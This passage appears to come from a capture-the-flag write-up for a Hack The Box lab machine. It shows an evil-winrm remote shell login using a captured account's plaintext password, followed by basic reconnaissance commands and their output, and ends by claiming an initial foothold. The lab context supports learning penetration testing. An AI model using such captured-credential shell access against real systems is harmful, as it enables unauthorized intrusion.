WinRM
Connecting to the target system using the credential of the henry.vinson_adm user
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ evil-winrm -i apt.htb.local -u henry.vinson_adm -p 'G1#Ny5@2dvht'
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\henry.vinson_adm\Documents> whoami
htb\henry.vinson_adm
*evil-winrm* ps c:\Users\henry.vinson_adm\Documents> hostname
apt
*evil-winrm* ps c:\Users\henry.vinson_adm\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::24b
ipv6 address. . . . . . . . . . . : dead:beef::183f:801c:80e2:9c63
ipv6 address. . . . . . . . . . . : dead:beef::b885:d62a:d679:573f
link-local ipv6 address . . . . . : fe80::183f:801c:80e2:9c63%5
ipv4 address. . . . . . . . . . . : 10.10.10.213
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : dead:beef::1
fe80::250:56ff:feb9:d784%5
10.10.10.2Initial Foothold established to the target system as the henry.vinson_adm user via WinRM